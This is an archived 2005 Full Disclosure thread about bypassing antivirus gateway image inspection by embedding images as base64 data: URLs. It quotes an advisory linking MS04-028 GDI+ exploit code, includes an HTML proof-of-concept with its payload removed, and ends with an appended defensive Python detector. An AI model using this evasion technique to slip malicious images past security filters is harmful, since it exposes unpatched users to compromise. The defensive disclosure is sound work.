Full Disclosure mailing list archives
RE: Multi-vendor AV gateway image inspection bypass vulnerability
From: "Mark Senior" <Mark.Senior () gov ab ca>
Date: Tue, 11 Jan 2005 13:22:45 -0700
Trend Micro OfficeScan client (version 6.5, virus definitions from 10 Jan 2005) didn't catch it in my case. I copied the html section from the original message straight to a text file and scanned that. I suppose it's possible some text wrapping munged the original posting.

Cheers
Mark

-----Original Message-----
From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Danny
Sent: January 11, 2005 12:14
To: Darren Bounds
Cc: bugs () securitytracker com; vulnwatch () vulnwatch org; bugtraq () securityfocus com; list () securiteam com; full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds <dbounds () intrusense com> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005

A vulnerability has been discovered which allows a remote attacker to bypass anti-virus (as well as other security technologies such as IDS and IPS) inspection of HTTP image content by leveraging techniques described in RFC 2397 for base64 encoding image content within the URL scheme. A remote attacker may encode a malicious image within the body of an HTML formatted document to circumvent content inspection.

For example: http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

The source code at the URL above will by default create a JPEG image that will attempt (and fail without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee); however, when the same image is base64 encoded using the technique described in RFC 2397 (documented below), inspection is not performed and the image is delivered and rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL scheme, Firefox, Safari, Mozilla and Opera do and will render the data, and thus successfully execute the payload if the necessary OS and/or application patches have not been applied.

## BEGIN HTML ##
<html>
<body>
<img src="data:image/gif;base64,[base64-encoded JPEG data removed from this archive copy]">
</body>
</html>
## END HTML ##

Solution:
While AV vendor patches are not yet available, fixes for all currently known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame.

Contributions:
Thanks to Scott Roeder and Jacinto Rodriquez for their assistance in platform testing.
I believe TrendMicro's OfficeScan (client-server scanner) will catch it, but I am not sure about their gateway device. What was their response?

...D

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
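The gap the advisory describes is that a gateway only scans images fetched as separate HTTP objects, so an image inlined as an RFC 2397 data: URL rides through inside the HTML. As an added example (not code from the original thread or from any of the vendors named), here is the check a gateway or mail scanner needs: pull every data: URL out of the HTML, decode it the way browsers do (tolerating the line-wrapping Mark mentions), and hand the decoded bytes to the scanner; comparing the declared type against the magic bytes adds a cheap signal, since the posted PoC declares image/gif but carries a JPEG. It assumes only quoted src/href attributes and a handful of image signatures; CSS url() and other carriers are not handled.

```python
import base64
import re
from urllib.parse import unquote_to_bytes

# data: URLs in quoted src/href attributes. Whitespace inside the value is
# accepted on purpose: mail wrapping split the base64 in the original post,
# and browsers strip it before decoding, so a scanner must do the same.
_DATA_URL = re.compile(r'''(?:src|href)\s*=\s*(?:"(data:[^"]*)"|'(data:[^']*)')''', re.I)

# Magic bytes of the image formats a gateway would expect in an <img>.
_MAGIC = [(b"\xff\xd8\xff", "image/jpeg"), (b"GIF87a", "image/gif"),
          (b"GIF89a", "image/gif"), (b"\x89PNG\r\n\x1a\n", "image/png")]

def decode_data_url(url):
    """Decode an RFC 2397 URL into (declared mediatype, raw bytes)."""
    header, _, payload = url[5:].partition(",")     # drop the "data:" scheme
    params = header.split(";")
    mediatype = params[0].strip().lower() or "text/plain"
    if params[-1].strip().lower() == "base64":
        b64 = re.sub(r"\s+", "", payload)           # tolerate wrapped lines
        b64 += "=" * (-len(b64) % 4)                # tolerate dropped padding
        return mediatype, base64.b64decode(b64)
    return mediatype, unquote_to_bytes(payload)     # percent-encoded form

def sniff_type(data):
    """Identify the real format from magic bytes, ignoring the declared one."""
    return next((m for sig, m in _MAGIC if data.startswith(sig)), "unknown")

def inspect_html(html):
    """List every embedded data: image with declared vs. actual type and size.
    The decoded bytes, not the HTML wrapper, are what the AV engine must scan;
    a declared/actual mismatch (image/gif carrying a JPEG) is an extra signal."""
    findings = []
    for m in _DATA_URL.finditer(html):
        declared, data = decode_data_url(m.group(1) or m.group(2))
        actual = sniff_type(data)
        findings.append({"declared": declared, "actual": actual, "size": len(data),
                         "mismatch": actual not in ("unknown", declared)})
    return findings

# Constructed sample (not the posted PoC): an honest 14-byte GIF stub, then a
# JPEG header declared as image/gif with its base64 wrapped across two lines.
_JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"A" * 20
_B64 = base64.b64encode(_JPEG_STUB).decode()
SAMPLE_HTML = ('<html><body>\n<img src="data:image/gif;base64,R0lGODlhAQABAAAAACw=">\n'
               '<img src="data:image/gif;base64,' + _B64[:12] + "\n " + _B64[12:] + '">\n'
               '</body></html>')
```

Running `inspect_html(SAMPLE_HTML)` reports the first image as a consistent GIF and the second as a JPEG mislabelled as image/gif; in a real deployment the returned bytes would be passed to the AV engine instead of being discarded.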